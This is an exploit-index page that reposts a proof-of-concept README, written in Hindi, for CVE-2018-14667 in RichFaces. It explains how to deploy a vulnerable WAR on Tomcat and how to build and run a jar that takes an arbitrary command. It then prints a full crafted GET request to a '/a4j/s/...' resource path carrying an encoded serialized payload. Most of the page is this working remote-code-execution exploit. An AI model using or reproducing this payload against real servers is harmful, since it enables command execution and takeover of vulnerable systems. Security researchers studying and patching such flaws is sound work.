Sploitus

Exploit for CVE-2018-14667-poc

kitploit · 2026-08-26

Exploit Code

MARKDOWN29 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-VENSCOR-CVE-2018-14667-POC
# CVE-2018-14667-poc Richfaces कमजोरी वातावरण और PoC

## लक्ष्य क्षेत्र: vul_environment के अंतर्गत war पैकेज को सीधे tomcat में डालें

## PoC

root@kitploit:~
    
    
    build:build artifactId
    run:java -jar CVE-2018-14667-poc.jar "cmd"
    

## डिबगिंग के बारे में

vul_environment के अंतर्गत war पैकेज को निकालें, फिर idea से आयात करें, और tomcat के अंतर्गत lib को library path में जोड़ें

## अनुरोध डेमो:

root@kitploit:~
    
    
    GET /a4j/s/3_3_3.Finalorg.ajax4jsf.resource.UserResource/n/s/-1487394660/DATA/eAF9kr9rFEEUx18Ogz-ihR4YUgi6itxZzDZaRYtwShT2FLJEMFbvZt-ds87OzM3MnovBdDY2FlpY2NkmlX-BrWCT!8BKRIQg2Du7eyQI4lTzZr7zfZ!3ZXZ!wqKzcE3bCcMcq-u5GzNLTpeWE9t0ZDfmxZVNK26jR6hX98aPDhxL4Ay3hJ4GWnlS3sO5JMcZxhLVJH4wyon71QSOU2VE8JzCDiwkcKLQmRgLyub14gxlSU1RmcBytbao2Bg5OcZ1YbQK3iz1odFdLTOyKc7IPvr88dab91-GHegkcJJLdO4-FvQ3Q-qtUJPAcMqFN1nj4eF8Syl0nJIVKMVzHElarUzd!lIdRT7SzjGSbEj-ic7uVCbwO6HVvcLI0cHy76VPZ4enASoLKy3uP7TTZHlp6!XXg06j6x7qjtw-vHyV!trav1krzLN38PbytqVpSc6zCflBPVOvf7hNNIbhw4EMm!Yyqk1ZHTfbKJUXBUWNvsXuRcHl6FyomX5KPVVK2WdUEe9F2pC6GK8ZIwVHH-Zz8QAlLyV6bRkaE!VfAJQWuo-bzNpW81T39h9--35he72hD59iwf8nDGNCvOYPxkraUw__.jsf HTTP/1.1
    Host: localhost:9999
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:40.0) Gecko/20100101 Firefox/40.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
    Connection: close